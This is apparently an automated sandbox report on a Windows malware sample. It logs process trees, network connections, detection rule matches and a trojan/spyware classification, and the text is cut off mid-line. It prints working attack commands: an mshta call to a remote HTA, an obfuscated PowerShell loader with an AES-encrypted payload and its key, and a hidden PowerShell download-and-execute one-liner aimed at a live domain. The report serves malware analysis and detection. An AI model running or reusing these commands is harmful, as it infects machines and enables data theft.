                Source: mshta.exe, 00000002.00000002.1824253687.000002059ADC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1801686518.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813735544.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1812901512.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1814020931.000002059ADC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4iqenvwh
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4m
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/singl7.mp4o
                Source: mshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scrutinycheck.cash/t
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownHTTPS traffic detected: 104.21.38.253:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49823 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49825 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49843 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49854 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49866 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,12_2_004329C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,12_2_004329C0

                System Summary

                barindex
                Source: Process Memory Space: powershell.exe PID: 2996, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D92B0 NtResumeThread,6_2_077D92B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D92A8 NtResumeThread,6_2_077D92A8
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B123E054_2_00007FFD9B123E05
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031723A86_2_031723A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0317D0886_2_0317D088
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0317371F6_2_0317371F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_031737206_2_03173720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0317F9B06_2_0317F9B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04D7B5806_2_04D7B580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_075D67A36_2_075D67A3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077BB1986_2_077BB198
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077CE5706_2_077CE570
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C39C06_2_077C39C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C11806_2_077C1180
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C14AD6_2_077C14AD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C12706_2_077C1270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077CCA046_2_077CCA04
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C5AE86_2_077C5AE8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C5AD86_2_077C5AD8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077C11706_2_077C1170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D00406_2_077D0040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D3F186_2_077D3F18
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D3F0B6_2_077D3F0B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D63A86_2_077D63A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D63976_2_077D6397
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D4D386_2_077D4D38
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D4D286_2_077D4D28
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D011D6_2_077D011D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D01B66_2_077D01B6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D70206_2_077D7020
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D70116_2_077D7011
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077D00076_2_077D0007
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E62F36_2_077E62F3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E37506_2_077E3750
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E37406_2_077E3740
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E86A06_2_077E86A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E868F6_2_077E868F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077EB5486_2_077EB548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077EB5A06_2_077EB5A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E498E6_2_077E498E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077EA46F6_2_077EA46F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E00406_2_077E0040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077E00076_2_077E0007
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_077EA4806_2_077EA480
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040885012_2_00408850
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042386012_2_00423860
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004218A012_2_004218A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042DA5312_2_0042DA53
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00437DF012_2_00437DF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004096C112_2_004096C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004266D012_2_004266D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041579912_2_00415799
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043881012_2_00438810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041682D12_2_0041682D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004288CB12_2_004288CB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D88012_2_0043D880
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043094012_2_00430940
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040397012_2_00403970
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042093912_2_00420939
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004179C112_2_004179C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004231C212_2_004231C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004241C012_2_004241C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043B1D012_2_0043B1D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004291DD12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D98012_2_0043D980
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040599012_2_00405990
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042219012_2_00422190
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D99712_2_0043D997
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D99912_2_0043D999
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004091B012_2_004091B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041626312_2_00416263
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040EA1012_2_0040EA10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041522012_2_00415220
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004252DD12_2_004252DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041B2E012_2_0041B2E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040628012_2_00406280
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043DA8012_2_0043DA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041E29012_2_0041E290
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041CB4012_2_0041CB40
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043D34D12_2_0043D34D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00426B5012_2_00426B50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043DB6012_2_0043DB60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00436B0812_2_00436B08
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042830D12_2_0042830D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040432012_2_00404320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042532712_2_00425327
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040833012_2_00408330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043F33012_2_0043F330
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042A33F12_2_0042A33F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040DBD912_2_0040DBD9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042438012_2_00424380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041FC7512_2_0041FC75
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041DC0012_2_0041DC00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00429C2B12_2_00429C2B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004291DD12_2_004291DD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004074F012_2_004074F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040ACF012_2_0040ACF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041148F12_2_0041148F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042AC9012_2_0042AC90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043ECA012_2_0043ECA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040CD4612_2_0040CD46
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043750012_2_00437500
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042251012_2_00422510
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00417DEE12_2_00417DEE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040958012_2_00409580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041759F12_2_0041759F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00425E7012_2_00425E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00436E7412_2_00436E74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042760312_2_00427603
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00425E3012_2_00425E30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004286C012_2_004286C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043AEC012_2_0043AEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004236E212_2_004236E2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00405EE012_2_00405EE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041DE8012_2_0041DE80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00402F5012_2_00402F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00420F5012_2_00420F50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00438F5912_2_00438F59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040671012_2_00406710
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00423F2012_2_00423F20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043F72012_2_0043F720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00419F3012_2_00419F30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041E7C012_2_0041E7C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004197C212_2_004197C2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0042DFE912_2_0042DFE9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040A78012_2_0040A780
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00411F9012_2_00411F90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0041879212_2_00418792
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043EFB012_2_0043EFB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00408030 appears 42 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414400 appears 65 times
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: Process Memory Space: powershell.exe PID: 2996, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@13/16@3/4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,12_2_00437DF0
                Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Lpcxeb
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1pizog1.dzn.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF79403